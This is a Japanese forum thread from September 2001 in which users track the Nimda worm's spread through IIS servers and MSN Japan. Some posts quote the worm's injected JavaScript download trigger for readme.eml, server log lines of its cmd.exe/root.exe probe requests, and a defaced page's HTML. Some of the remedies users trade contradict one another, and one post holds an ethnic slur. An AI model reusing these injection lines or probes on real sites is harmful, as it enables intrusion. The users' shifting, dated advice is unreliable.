:01/09/19 03:22 ID:75aQuCX2
>>442 ネタか?ネタじゃないとしたら、今後それも解らないまま
ネット生活を続けると、自分のみならず他にも知らず知らずの内に
トラブルを与えることになるぞ。
まぁ個人セキュリティがこれからの重要課題という事で。
ちなみにサーバーはインターネット上で皆にウェブサービスを
与えるコンピュータ。パケットはそれら、ないしはクライアント間で
やり取りされる情報の単位表現。
で、今回の騒動は他コンピュータに悪意有るコードを広げるために
Nimdaワームがパケットを莫大に送っている、ということで。
451 :
:01/09/19 03:23 ID:WCIFwurw
>>448 胴衣
98だけどreadme.emlもって
マイクロソフト行ったら
MEP51B3.TMP.EXE落としてきたもん
結構やばいよ
452 :
ぺ :01/09/19 03:28 ID:EGLNsppk
codered系の進化系かねこれ? 実行はそりゃしちゃいけないよ〜。それ常識。 IISでWebサーバしてる人はcodered系の動きしそうだから 防衛しなきゃだねぇ。
453 :
:01/09/19 03:28 ID:KFI1bVoI
>>451 俺もZAのアクセスログのIPにIEで繋ぎにいったら、
そのファイル名のダウンロードになった。
454 :
・・・ :01/09/19 03:29 ID:lABSydVE
emlを、毎日検索してれば平気ですか?
455 :
:01/09/19 03:30 ID:vHTlQvaQ
今回のは鯖同士の感染よりreadme.exeの方が被害が大きいと思われ。
456 :
ふぅ :01/09/19 03:30 ID:TqJUoha6
プロバの鯖がやられたみたい…。 俺のHPにもjavaスクリプトが追加されてたよ。。。鬱だ。 とりあえずhtmは削除してみたが、readme.emlってファイルは 消してもしばらくすると復活する。。。
457 :
:01/09/19 03:32 ID:vHTlQvaQ
458 :
:01/09/19 03:32 ID:WCIFwurw
>>453 やっぱりかなりやばいな
おれZA65回反応してる
459 :
:01/09/19 03:33 ID:Qb3w7wGo
>>454 オレもシロウトみたいなもんだが・・・
eml消せば問題ないでしょ exeは当然削除
460 :
:01/09/19 03:34 ID:WCIFwurw
461 :
:01/09/19 03:34 ID:Qb3w7wGo
462 :
ハァ・・・ :01/09/19 03:35 ID:lABSydVE
>>459 ありがとうございます。
自分が無知すぎて恥ずかしくなります・・・。
ココの板の住人さんたちは,優しいですね。
私が住み着いてるところだったら
きっと叩かれまくると思ふ・・・。
463 :
ペ :01/09/19 03:36 ID:EGLNsppk
>>455 readme.exeがどんな熱い感染・破壊活動するか楽しみだね♪
464 :
:01/09/19 03:36 ID:WCIFwurw
>>459 ZAつけといて
MEP51B3.TMP.EXE
も検索すればいいかも
465 :
:01/09/19 03:36 ID:wdNmkryY
2chのサーバーってだいじょうぶなのか?
466 :
:01/09/19 03:37 ID:vHTlQvaQ
MSNみたいな素人が集まる場所に感染するんだもんなぁ…。 MSNってホームページ(狭義の)に設定してる人すごい多いんじゃないの?
467 :
:01/09/19 03:38 ID:vHTlQvaQ
>>465 2ちゃんねるはLinux+Apacheだから問題ない。
468 :
ペ :01/09/19 03:38 ID:EGLNsppk
ここは大丈夫 ただしかし、きっとここも不要なトラフィックが増えてるだろうけどねぇ。
469 :
:01/09/19 03:39 ID:Qb3w7wGo
>>464 ヘボイから検索してきたよ・・・
「ZONE ALARM」ね 名前は知ってるけど、全然導入考えてなかった
いれよっかな
470 :
:01/09/19 03:41 ID:Qb3w7wGo
ネット初心者、特におじさんおばさんはホームページmsnだよね 初期設定だよね?
471 :
:01/09/19 03:42 ID:eiodJYMI
だな
472 :
:01/09/19 03:42 ID:KFI1bVoI
>>456 完全に感染してるね。
どれだけの期間でMSNが対処したかわからないけどMSNから大量感染だろうな。
過去最大の被害になるよ、おそらく・・・
473 :
h :01/09/19 03:42 ID:2CA17/4Q
さっきから言ってる「MEP51B3.TMP.EXE」って何ですか? まあうちのPCにはなかったけど。readme.exeは落としてしまった・・・。
474 :
:01/09/19 03:43 ID:0JDuiGy.
475 :
:01/09/19 03:44 ID:vHTlQvaQ
>>456 みたいなISPがもっとあるとすると被害は計り知れないな。。。
476 :
ぺ :01/09/19 03:44 ID:EGLNsppk
もしかしたら、readme.exeって感染した普通のマシンから www connectionいっぱいしてIIS探して更に感染広げていくのかなぁ? かっちぇ〜。(妄想) 本当の動作が分るの楽しみだわ〜♪
477 :
:01/09/19 03:44 ID:9lsu1nFM
478 :
:01/09/19 03:45 ID:vHTlQvaQ
479 :
:01/09/19 03:45 ID:Qb3w7wGo
480 :
:01/09/19 03:48 ID:vHTlQvaQ
481 :
イイ :01/09/19 03:48 ID:2CA17/4Q
まだ増えるんだろうな。 でもさっきの検索はイイ!
482 :
:01/09/19 03:49 ID:KFI1bVoI
>>474 これって・・・
検索データベースはロボットによる登録だよね。
ということは、氷山の一角に過ぎない。
新たなセキュリティホールでの感染だったら、IISのサーバー全滅じゃん。
483 :
:01/09/19 03:49 ID:vHTlQvaQ
484 :
:01/09/19 03:50 ID:4k6cL0vM
明日の朝には18件が1800件になってたり・・・
485 :
:01/09/19 03:50 ID:vHTlQvaQ
486 :
:01/09/19 03:51 ID:2CA17/4Q
今日の夜にでもまた検索かけてみよう。 どうなってるかな? ワクワク
487 :
IE6.0OK :01/09/19 03:51 ID:lQaTfxhA
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> ↑ こういうタグで書き換えられてる。 (マックスバリュー東北の現在改ざんされてるソースより)
488 :
:01/09/19 03:52 ID:WCIFwurw
489 :
:01/09/19 03:53 ID:2CA17/4Q
なんどか検索しなおすたびにHit数が上がってく。 さっきは14だったのに今は18だ・・・。
490 :
:01/09/19 03:56 ID:WCIFwurw
491 :
ひまじん :01/09/19 03:58 ID:GmvEeRHo
3:58現在、 www.msn.co.jp 開けません。
今きたんだよ〜…なんちゅう事がおきてんだ…マジ?
493 :
:01/09/19 03:59 ID:P2Rw92t6
このスレがこんなにしょぼい進行とは・・・ テロの影響とはかくなるものか。本来、大祭開催決定の話なんだけどなぁ。 天下のMS日本法人の失態というのに。 さて、寝よう。
494 :
:01/09/19 04:00 ID:KFI1bVoI
会社のWEBサーバー事情があってIISなんだよね。 セキュリティ関連のアップデートは常に最新のものにしてたから、ある程度安心してた。 もしかしてと思って、今pcANYWHEREで繋ぎに行ったら、readme.emlがあった・・・・・・・・ 早急にWEBサーバーサービスを停止。 最悪だ・・・・・ IISサーバーにはすべて感染するよ・・・・・
495 :
ひまじん :01/09/19 04:01 ID:GmvEeRHo
あした、ワクチン、出来てるかなぁ・・・はぁ(ToT)
496 :
:01/09/19 04:01 ID:NlxByP..
MSN開かないし〜
497 :
:01/09/19 04:02 ID:rkXvUCbU
498 :
:01/09/19 04:02 ID:l1CSEffI
499 :
感染しちゃった人へ :01/09/19 04:02 ID:NRln1zEY
500 :
:01/09/19 04:03 ID:g0s0z5vI
501 :
456 :01/09/19 04:03 ID:TqJUoha6
ちなみにここ。片田舎のこじんまりしたプロバですわ。
http://www.mfi.or.jp/www/ (まだ危険な状態)
javaについての警告文が切ないね(w
ユーザーは自分のHPを登録できるんだが、登録されているHPすべてNGだと思われ。
ちなみに俺は登録してない。
502 :
:01/09/19 04:04 ID:P2Rw92t6
>>498 状況が正確に理解・説明できる方は、
関係各位に通報すべきでしょうね。
503 :
:01/09/19 04:05 ID:KFI1bVoI
>>499 MSNが感染したということは、Code Blueでもない、さらに新種のものでは?
504 :
500 :01/09/19 04:05 ID:g0s0z5vI
ちなにみトップのソースには しっかり「readme.eml」の文字があります
505 :
:01/09/19 04:05 ID:WCIFwurw
つか、気がつけばマジレスばっか
>>500 開きたくない
506 :
たろう :01/09/19 04:06 ID:ZWfpd6IE
ログは、こんな感じ・・・。 [19/Sep/2001:03:34:02 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 [19/Sep/2001:03:34:02 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 [19/Sep/2001:03:34:02 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
507 :
:01/09/19 04:06 ID:vHTlQvaQ
508 :
:01/09/19 04:06 ID:esEszMug
>>352 ノートンでヒューリスティックスキャンを最高レヴェルにしたけど引っかからなかったYO!
ヒューリスティックスキャンて当てにならないんだね
509 :
:01/09/19 04:06 ID:vHTlQvaQ
下手すりゃ
>>500 がすべての始まりじゃねぇの?
510 :
498 :01/09/19 04:06 ID:l1CSEffI
大変なことが起こっているってのは、わかるけど、 なにせ、おれ厨房だから、説明できんのよ。 誰かしようぜ。 2chのいいとこも見せなきゃ!!
511 :
:01/09/19 04:07 ID:g0s0z5vI
>>505 JavaScriptを無効にしてれば怖くないよ
512 :
:01/09/19 04:07 ID:KHXd944U
>>500 どんな感じ?
気になる、が怖くて開けない
513 :
:01/09/19 04:07 ID:rkXvUCbU
オリコも感染中。 おいら、オリコに警告メールしてあげたぞ!
514 :
:01/09/19 04:07 ID:vHTlQvaQ
>>510 ノートンですでに発表されてるのにipaにタレコまれてないはずがない。
515 :
( ̄▽ ̄; :01/09/19 04:09 ID:630yIQG.
>>500 我們是中国人!
hacker by 刀瘋
516 :
>>510 :01/09/19 04:09 ID:l1CSEffI
517 :
たろう :01/09/19 04:09 ID:ZWfpd6IE
どんどん、web サーバに Get をリクエストしてくるよ〜・・・。
518 :
:01/09/19 04:10 ID:P2Rw92t6
519 :
:01/09/19 04:10 ID:vHTlQvaQ
520 :
:01/09/19 04:11 ID:WCIFwurw
521 :
:01/09/19 04:11 ID:630yIQG.
fuck censorship! 検閲?
522 :
名無し :01/09/19 04:12 ID:ATAnI.UE
523 :
:01/09/19 04:12 ID:esEszMug
スカパーでFox Newsみてたら、Code Redの亜種で「ミンダ?」 とかいうウィルスが感染を広げてるって生放送でやってたけど 関係あるのかな?
524 :
500 :01/09/19 04:12 ID:g0s0z5vI
525 :
:01/09/19 04:13 ID:JlX0ElGE
526 :
510 :01/09/19 04:14 ID:l1CSEffI
>>518 オレ、こわいから、URLずうっと踏んでないんよ。
普通のPCはダイジョウビなの?
オレのは、WinMEで、IE5.50なんだけど、
527 :
:01/09/19 04:14 ID:Qb3w7wGo
528 :
:01/09/19 04:14 ID:P2Rw92t6
529 :
:01/09/19 04:14 ID:JlX0ElGE
ここってたぶんスレッド名がそんなにインパクト無いから 読んでない人いっぱい居るんだろうな。
530 :
凄ぇ :01/09/19 04:15 ID:coAmD4i2
>>500 これは一回見ておくべきと思われる。
java off でだいじょぶだったよ
531 :
:01/09/19 04:15 ID:h.zvRD.A
スレを一通り読んでなお、どのURLもクリックできない自分の へたれ具合が悲しい。
532 :
800 :01/09/19 04:15 ID:t1iy5cB2
533 :
再び質問です :01/09/19 04:15 ID:lABSydVE
さっき、ZONE ALARMの存在を知ったんですが インストールしておいた方がいいのでしょうか?
534 :
:01/09/19 04:16 ID:P2Rw92t6
>>529 建て直しも、許されるとおもわれる。かなり大きい話になっているから。
でもぉ、ぼくに〜は スレ建てできなーい♪ 誰か任せた。
535 :
:01/09/19 04:16 ID:KHXd944U
確かにカナリヤバイ のわりに伸びが悪いしな
536 :
:01/09/19 04:16 ID:rkXvUCbU
Netscape 6でもDLダイアログ開くよ。ネコミだけじゃないか?大丈夫なブラウザは!
537 :
:01/09/19 04:17 ID:WCIFwurw
538 :
:01/09/19 04:17 ID:0NalqMuE
ずいぶん前に入れたTinyしかない…
539 :
仕様書無しさん :01/09/19 04:17 ID:PgB291s2
>>526 IE 5.5 / 5.01 の SP2 なら大丈夫。だが、readme.exe を手動で起動してはダメ。
SP1 以前だと、アクセスしただけで勝手に readme.exe が起動してしまう。
540 :
:01/09/19 04:17 ID:KHXd944U
541 :
:01/09/19 04:17 ID:KFI1bVoI
小泉政権に対する、中国人のサイバーテロだね、これは・・・・
542 :
:01/09/19 04:17 ID:yiqzO60A
543 :
:01/09/19 04:18 ID:RKJ/sbTQ
msnって確かIEのデフォホームページよな・・・ セキュリティーパッチなんて当ててないと思われる PC初心者が大量に見たんだろうなぁ・・・
544 :
:01/09/19 04:19 ID:630yIQG.
545 :
:01/09/19 04:20 ID:esEszMug
546 :
:01/09/19 04:21 ID:WEST34LM
あのーすいませんが・・・みなんさん何を悩んでいるのでしょうか? ぼくはMSNのホットメールを使ってるんですが、そこにもアクセスしないほうがよいんでしょうか? あほな質問すいません・・・ちなみに、最近どーもネットにつながりにくくなったり、以上に遅かったりするんで、 IE5.5にしました。
547 :
510 :01/09/19 04:21 ID:l1CSEffI
>>500 見たけど、IEフリーズしたよ。
かちゅーしゃは、すげえよ。
ハカーなんて、意味ないね。
でも、なんだかばびってきた。
548 :
:01/09/19 04:21 ID:IlMW14nA
>>543 俺も昨日Win98セットアップして自動で飛ばされたよ…
洒落にならん。
549 :
:01/09/19 04:22 ID:JlX0ElGE
550 :
500 :01/09/19 04:22 ID:g0s0z5vI
( ´Д`)y──┛~~「うなぎ」見てる間ににわかにすごいことになってたな。
ちなみに
>>500 のソース(ハック後)
<HTML><HEAD><TITLE>China!!!!</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>P {
MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px
}
</STYLE>
<BGSOUND balance=0 src="china.mid" volume=30 loop=2>
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY text=#ff0000 bgColor=#000000>
<CENTER>
<CENTER><FONT face=arial></FONT>
<CENTER>
<P><B><IMG height=110 src="guoqi.gif" width=161></B></P>
<P><B><FONT size=7>ホメテヌハヌヨミケネヒ!</FONT></B></P>
<P><font face="arial" size="6">we are chinese!<br>
fuck censorship!</font></P>
<P><img border="0" src="xq.JPEG" width="145" height="201"><font face="arial" size="5"><br>
</font><B><FONT
align="center" ><font size="5">hacker by オカキ?</font></font></B><FONT
align="center" ><FONT face=arial><FONT
color=#ff0000><B>!</B></FONT></P>
</font>
<P>。。</P>
</font></CENTER></CENTER></CENTER></BODY></HTML>
マジ・・・MSNがクラックされたんだ!>バンザーイ
553 :
474 :01/09/19 04:23 ID:0JDuiGy.
怖いもの検索しちゃったよ・・・(;´Д`) MSN、デフォルトHPだからヤバいよ・・・ 職場、パソコン屋なんだけど、デモ機のトップページが 全てデフォルトのままだった・・・撃打詩嚢
554 :
文字化けして見えるの :01/09/19 04:23 ID:0NalqMuE
555 :
たろう :01/09/19 04:24 ID:ZWfpd6IE
これっていつからなの??
556 :
:01/09/19 04:24 ID:7SD2bK6Y
>>549 ありがと、にしてもセンスのかけらもねーな(w
>>554 ( ´Д`)y──┛~~hacker by 偽決!←が文字化けしたと思われ
558 :
_ :01/09/19 04:25 ID:T.W/lyRg
559 :
:01/09/19 04:25 ID:Qb3w7wGo
オレももちろんhtmlと画像2コ落としておいたよ
560 :
:01/09/19 04:25 ID:IlMW14nA
中国独特の言い回しなのか?>hacker by
561 :
:01/09/19 04:26 ID:RKJ/sbTQ
562 :
:01/09/19 04:26 ID:rkXvUCbU
IEのキャッシュにいくつも残ってたよ。(;´Д`)
563 :
:01/09/19 04:27 ID:Qb3w7wGo
564 :
a :01/09/19 04:27 ID:K6a2h/a.
祭り♥
565 :
:01/09/19 04:27 ID:KFI1bVoI
>>558 Unicode Web Traversalのセキュリティパッチなんて出てないよ。
要は現段階では全てのIISサーバーに感染するって事じゃないの?
566 :
510 :01/09/19 04:27 ID:l1CSEffI
>>554 ほんとだ。オカキて、意味あんのかな。
オレなら、放送禁止用語とか使うのに・・・。
567 :
:01/09/19 04:27 ID:XnLyCzPM
568 :
超素人 :01/09/19 04:28 ID:WEST34LM
あのーすいません MSNのホットメールつかってるんですが…あくせすしただけでやばいじょうきょうなんでしょうか? よろしくおねがいします
569 :
510 :01/09/19 04:29 ID:l1CSEffI
テロ仲間ってやっぱ、中国も疑われるかもね。
570 :
:01/09/19 04:30 ID:JlX0ElGE
571 :
:01/09/19 04:30 ID:wrcU3qAs
チョト早いがそろそろ次のスレのテンプレ決めようぜ。 あ、まずタイトルからか? 【緊急】MSNにウィルス???【緊急】 ってかんじ? あ、このスレのタイトルよりもインパクト弱いかも。 鬱氏…。
572 :
:01/09/19 04:31 ID:WCIFwurw
573 :
:01/09/19 04:31 ID:JlX0ElGE
これくらいやっていいんじゃない? 【緊急】新種ウィルス大規模感染中!!【緊急】
574 :
:01/09/19 04:32 ID:Qb3w7wGo
>>569 まあオカキだからギャグで通じるんじゃないか(藁
>>568 hotmailはwww,msn.co.jpにアクセスしないよね?だったら大丈夫 だよね?
575 :
:01/09/19 04:32 ID:h.ZU52lw
Nimda警報! 今すぐJavaScriptを切れ! とか
576 :
超素人 :01/09/19 04:32 ID:WEST34LM
577 :
:01/09/19 04:32 ID:OmhilR7Q
>>568 自分さっきまでHotmail使ってたので
ここ見てビクーリしたよ。
578 :
:01/09/19 04:33 ID:XnLyCzPM
>568 ID面白い(笑
579 :
超素人 :01/09/19 04:33 ID:WEST34LM
580 :
494 :01/09/19 04:33 ID:KFI1bVoI
会社の感染したサーバー、 再インストしか修復方法が無かったら嫌だな・・・ 鬱だな・・・
581 :
:01/09/19 04:34 ID:g0s0z5vI
582 :
これって :01/09/19 04:35 ID:XnLyCzPM
ふつうにJavaScript切ってれば回避できるような物なの? >ブラウザの種類バージョンに関係なく おみとろんの有無とか
583 :
中村正三郎 :01/09/19 04:35 ID:c7x73Voc
MS 製品を使っているのが悪い!自業自得だ!
584 :
:01/09/19 04:35 ID:rkXvUCbU
585 :
仕様書無しさん :01/09/19 04:36 ID:PgB291s2
>>575 今回のはJavaScriptは関係ない。切っても対処にならない。
586 :
510 :01/09/19 04:36 ID:l1CSEffI
Yahooはダイジョウビなんだよね? 今、確認したら、IE5.50、SP2だった。よかった。 でも、当分は、Javaとかは、全部きっといたほうが良いね。
587 :
:01/09/19 04:37 ID:630yIQG.
>>500 へぼ翻訳ソフトで訳してみたーり
私たちは中国人です!
検閲と性交して!
ハッカー by ナイフ狂気
588 :
:01/09/19 04:37 ID:WCIFwurw
>>582 アクセスすると
JAVASCRIPTで新しいウインドウ開く
そしてダウンロード
589 :
494 :01/09/19 04:37 ID:KFI1bVoI
>>583 自業自得といわれても・・・
使いたくないけど、使わざるをえない状態なんです、仕事上どうしても・・・
590 :
:01/09/19 04:38 ID:mxUXkeNs
591 :
575 :01/09/19 04:40 ID:btHb6sxc
proxomitron でもOK。「Kill add-on JavaScripts」 ね。 自分でフィルタ作るとか。[Nimda Killed] そうすればどこが感染してるかわかる。
592 :
ななし :01/09/19 04:40 ID:c7x73Voc
>>589 あ、すまそ。
名前欄のところで笑ってもらえるとうれしかったんだけど・・・
すまそ。
593 :
510 :01/09/19 04:41 ID:l1CSEffI
明日、大学のお祭りぶりが目に浮かぶよ。 未だに、Win95とかだったりするとこだから。 あ、オレ、明日再試だった。 無くなってくれ再試!! てか、これ、紙だから関係ないか。
594 :
494 :01/09/19 04:45 ID:KFI1bVoI
他に感染した人教えて、readme.emlのタイムスタンプどうなってる? 自分の会社のサーバーのは 9/18 22:24 なんだけど。 これって、感染した日時かな? 削除しても同じタイムスタンプですぐに復活する。
595 :
:01/09/19 04:45 ID:XnLyCzPM
596 :
510 :01/09/19 04:47 ID:l1CSEffI
>>595 スマソ。
でも、ダイジョウビ?
URLは踏んでないの?
597 :
たろう :01/09/19 04:49 ID:ZWfpd6IE
>>594 うちは、これが一番最初・・・。
202.XXX.XXX.185 - - [18/Sep/2001:21:50:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
598 :
:01/09/19 04:50 ID:WCIFwurw
599 :
:01/09/19 04:50 ID:RKJ/sbTQ
このスレ、結構重要だからageとこう。
600 :
494 :01/09/19 04:50 ID:KFI1bVoI
Unicode Web Traversalのセキュリティパッチ まだ出てないよね?
601 :
:01/09/19 04:52 ID:5y7UIAZw
スレ名は、 やっぱり.....MSN撃沈!?
602 :
ななし :01/09/19 04:52 ID:c7x73Voc
603 :
494 :01/09/19 04:53 ID:KFI1bVoI
604 :
:01/09/19 04:54 ID:XnLyCzPM
>>596 (510)
たぶん大丈夫。ボロPCの自覚あるし何よりビビリなんで
このスレにあるURLただのいっこもさわってなかった…(笑
祭りに参加できないのは寂しいけど。
605 :
:01/09/19 04:57 ID:n4L45OLo
Yahoo!のトップのところに出てるね
606 :
助けて :01/09/19 04:58 ID:L.IUjq.k
500のサイト見て大笑いしてたのは良かったんですけど案の定readme.emlがTemporaryフォルダにありました。 それを削除したのはいいんですがゴミ箱にも入らずどこかに行ってしまいました。 その後アプリが何一つ動かなくなって再起動したんですがエラーチェックのあとで、 「Windowsの設定を更新しました」って出たんですがこれってやばいんですかね? ちなみにWin98、IE5.0です。
607 :
:01/09/19 04:58 ID:KojYlda2
608 :
510 :01/09/19 05:00 ID:l1CSEffI
やっぱ、とりあえず。 「readme.eml」を、検索しといた方がいいのかな。
609 :
:01/09/19 05:00 ID:IYcrrrIQ
シマンテックのページではダメージは「低」に認定されてる。
610 :
494 :01/09/19 05:01 ID:KFI1bVoI
>>602 ありがとうございます、それです。
18日配布開始って・・・
一歩遅かったか・・・
今からあてても、手遅れかな?
でもとりあえずあててみます。
なので、一時退散。
611 :
ななし :01/09/19 05:02 ID:c7x73Voc
>>608 うちは Netscape なんだけど、キャッシュフォルダに、
readme.eml とは別の名前で残っていたりしたよ。
*.eml で検索をかけて、出てきた怪しいものを消したです。
612 :
:01/09/19 05:02 ID:WCIFwurw
>>608 readme.eml
readme.exe
MEP51B3.TMP.EXE
を検索すべし
613 :
510 :01/09/19 05:04 ID:l1CSEffI
614 :
!!!警告 :01/09/19 05:05 ID:mxUXkeNs
◆◆◆ 警告 ◆◆◆ とにかく、わけがわからないやつは 感染されたページを絶対見に行くな。 ◆◆◆ マジ警告 ◆◆◆
615 :
:01/09/19 05:06 ID:JlX0ElGE
>>614 あまりに大規模感染してるからどこの鯖が感染してるかわからない。
616 :
:01/09/19 05:07 ID:mxUXkeNs
◆◆◆ 警告その2 ◆◆◆ JavaScript OFF
617 :
:01/09/19 05:07 ID:Qb3w7wGo
く〜寝たくないな〜 しょうがない 3時間だけ寝よう 起きたらこのスレ亡くなってるよな・・・
618 :
:01/09/19 05:06 ID:0NJWkeCg
>>606 ぎゃー!
IEのバージョン確認しようとしたらmsnが開いたー!
619 :
:01/09/19 05:07 ID:JlX0ElGE
エロサイト行ってわけもわからずQ2に繋がれてしまうようなオヤジは 確実に感染するんだろうな…。
620 :
:01/09/19 05:07 ID:bCtIlDWo
反日って中国のことらったのれすね。 お〜こわっ!!
621 :
これって :01/09/19 05:09 ID:hSi4vkjQ
JavaScriptとか関係なく、5.5以前の人は ひらけばもれなくおくられてくる?
622 :
:01/09/19 05:11 ID:ai6DxlkQ
JavaScript切ったIE5.01@win98SEで覗いてみたけど大丈夫だったよ。
623 :
:01/09/19 05:11 ID:WvOI5VHM
Yahoo! ニュースの方々は夜勤体制とってるのかな? ちゃんと、このウィルスについてトップで出てた!! 2ちゃんねらーなのかヤフー職員は・・・・・??
624 :
:01/09/19 05:12 ID:WCIFwurw
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> だから多分JAVASCRIPTをOFFにすれば多分大丈夫
625 :
ななし :01/09/19 05:12 ID:c7x73Voc
あ、Javascript を有効にしてた・・・NC4.78 (汗
626 :
メッチャ検索エンジン :01/09/19 05:12 ID:N3D6sFl.
28件ヒットしたよ bach.cs.kobe-u.ac.jp/cgi-bin/metcha.cgi?q=readme.eml&speed=s&max=0&site=0&altavista=1&excite=1&fast=1&fresheye=1&goo=1&infoseek=1&lycos=1&nexearch=1&tocc=1&verno=1&yahoo=1
627 :
なんて :01/09/19 05:14 ID:5y7UIAZw
>>625 それーー
検索しよう
>>612 readme.eml
readme.exe
MEP51B3.TMP.EXE
を検索すべし
628 :
:01/09/19 05:14 ID:WCIFwurw
検索エンジンで28てことは・・
629 :
606 :01/09/19 05:16 ID:L.IUjq.k
で、キャッシュからreadme.emlを削除すれば大丈夫ですか? 「Windowsの設定を更新しました」って出たのがえらく気がかりなんですが。
630 :
:01/09/19 05:18 ID:JlX0ElGE
>>500 のサイトは
トップページが
Last-Modified: Tue, 18 Sep 2001 13:09:40 GMT(日本時間18日22時9分)
クラックページが
Last-Modified: Wed, 15 Aug 2001 09:39:30 GMT(日本時間15日18時39分)
クラックされた後に今回のワームに感染したらしいな。
15日からずっと放置かよ。鯖缶のずさんさが際立つ…。
631 :
ななし :01/09/19 05:19 ID:c7x73Voc
>>627 どもです。
とりあえず、ありませんでした。
今から virus scan をかけよう・・・
632 :
:01/09/19 05:20 ID:JlX0ElGE
>>631 定義ファイルが更新されてないんだからスキャンは意味無いって。
定義ファイルが明日にも出るからそれまではおとなしくしてましょう。
633 :
510 :01/09/19 05:20 ID:l1CSEffI
2chて、 かなり信用できると思うから、 技術者でも見てる人多いよ。 きっと、 オレって、じつは大学の助教授にココ教えてもらったのYO この人情報処理専門の人だったりしたしね。
634 :
606 :01/09/19 05:21 ID:L.IUjq.k
635 :
510 :01/09/19 05:21 ID:l1CSEffI
636 :
:01/09/19 05:22 ID:JlX0ElGE
637 :
ななし :01/09/19 05:22 ID:c7x73Voc
638 :
:01/09/19 05:22 ID:7SD2bK6Y
ああ、八月十五日ってあの日じゃん
639 :
:01/09/19 05:22 ID:LNEMDmj.
Javascriptは無効になってた。 初めて半角板逝ってて良かったと思った。
640 :
:01/09/19 05:23 ID:JlX0ElGE
っていうか、8/15って終戦記念日か。なるほど。 それ以来放置ってすごいな…。
641 :
606 :01/09/19 05:25 ID:L.IUjq.k
>>635 やっぱりやばいですか?
もし感染してたとして「これだけはするな」とか「これだけはしとけ」みたいなことあったら教えてくれませんか?
642 :
ななし :01/09/19 05:26 ID:c7x73Voc
>>632 あ、更新されていないんですか・・・(大汗
おとなしくしておきます・・・
643 :
:01/09/19 05:27 ID:mxUXkeNs
>>641 寝とけ、明日ワクチンソフトのアップデートをしてからネットしろ
644 :
:01/09/19 05:27 ID:WCIFwurw
645 :
あのぅ・・・ :01/09/19 05:29 ID:lABSydVE
>>644 教えてください。
ZAを起動させてたら、何が分かるんですか?
今,インストールしてきたばかりなもので・・・
646 :
>>510 :01/09/19 05:30 ID:l1CSEffI
>>641 僕は厨房だよ!!
ごめんYO。
んで、
いちお、
最近ZoneAlarmつけたんだけど、よく鳴るんだよね。
これが・・・。
関係ないよね。
647 :
:01/09/19 05:30 ID:8BWOWuJM
いま、MSNのページに見れる? なんか、見れないよ
648 :
ななし :01/09/19 05:32 ID:l9CMMeIk
チョンとシナは氏ね
649 :
ZA :01/09/19 05:33 ID:WCIFwurw
自分のパソコンへの不正アクセス抑えたり アプリが外部へアクセスしようとすると教えてくれる など
650 :
:01/09/19 05:33 ID:JlX0ElGE
ZAとかってしらんけどさ、 要するにパケット監視だかポート監視だかでしょ? だったらreadme.exeとは全く関係ない。 ZAがアラーム鳴らすからってWin98ユーザには一切関係なし。
651 :
606 :01/09/19 05:33 ID:L.IUjq.k
ZoneAlarmってBlackIceみたいなものですか? BlackIceなら入れてるんですけど・・・。
652 :
:01/09/19 05:33 ID:rkXvUCbU
653 :
へむたん ヽ(‘w')メ('w')ノ :01/09/19 05:33 ID:UvZnOotU
おとといくらいから msn uk 見れなかったんだけどこれが原因かな? IE5.50 SP2 デス。
654 :
ななし :01/09/19 05:35 ID:c7x73Voc
うち、Norton Internet Security を入れているけど、 今回に関しては、何の警告も出てこなかったよ。
655 :
:01/09/19 05:36 ID:kXboTpic
656 :
:01/09/19 05:38 ID:kXboTpic
id X bo
657 :
606 :01/09/19 05:38 ID:L.IUjq.k
>>655 ちょうど俺にぴったりのスレですね。(w
658 :
:01/09/19 05:39 ID:mxUXkeNs
◆◆◆ あんたら入れてる意味無し逝ってヨシ ◆◆◆ ZA BlackIce NortonIS まったく関係無し。 はやく寝よう。
659 :
ななし :01/09/19 05:39 ID:c7x73Voc
何げに、日大工学部スレもおもしろそう・・・
660 :
:01/09/19 05:40 ID:WCIFwurw
>>650 そうかもしれないけどアクセスログのIPにつなげると
MEP51B3.TMP.EXEとかダウンロードしちゃうのよ
誰かおせーて
661 :
n :01/09/19 05:42 ID:kK/RiRSk
662 :
:01/09/19 05:45 ID:WCIFwurw
寝りゅ
663 :
:01/09/19 05:46 ID:mxUXkeNs
664 :
S :01/09/19 05:47 ID:FOTx/ff.
感染しちゃったよ〜〜
665 :
494 :01/09/19 05:48 ID:KFI1bVoI
戻ってきました。 Unicode Web Traversalのセキュリティパッチ をあてて、再起動したら、しばらく動作した直後サーバーが死亡。 これから、出勤して確認しなければ・・・ 鬱過ぎる。 おそらく、再インストだな・・・
666 :
:01/09/19 05:50 ID:rkXvUCbU
>>665 こんな時間にお疲れ様です。(;´Д`)
667 :
a :01/09/19 05:51 ID:YwgCdDeY
668 :
:01/09/19 05:52 ID:JlX0ElGE
>>660 WEBサーバがNimdaに感染。→HTMLにreadme.emlやreadme.exeを仕掛ける。
↓
あちこちのIISサーバめがけて増殖活動。
(これがZAにひっかかる。IISなのでWin98ユーザは関係ない。)
669 :
668 :01/09/19 05:53 ID:JlX0ElGE
追記。 あちこちのIISサーバめがけて増殖活動。 (これがZAにひっかかる。IISなのでWin98ユーザは関係ない。) (IPアドレスをブラウザで開くとreadme.exeがあったりするのは、 感染したWEBサーバにアクセスしてるんだから当然。)
670 :
ん? :01/09/19 05:53 ID:1rZyLqRQ
671 :
668 :01/09/19 05:55 ID:JlX0ElGE
つまり、readme.exe経由で感染するのとZAが警告するのとは 全く別ルートの話なので無関係。
672 :
:01/09/19 05:55 ID:/3W03QCw
サーバ管理者の皆さんはこれから大変みたいですね。お体に気をつけて。
673 :
494 :01/09/19 05:56 ID:KFI1bVoI
674 :
:01/09/19 05:57 ID:JlX0ElGE
>>673 この際UNIX系入れちゃえばいいのに。。
まぁ、そうもいかないのが企業なんだろうけど。
お疲れさまです。
675 :
:01/09/19 05:57 ID:zF0vrHpU
結局readme.exeを実行するとどうなるの?
676 :
まいこ :01/09/19 05:58 ID:tDTelfP6
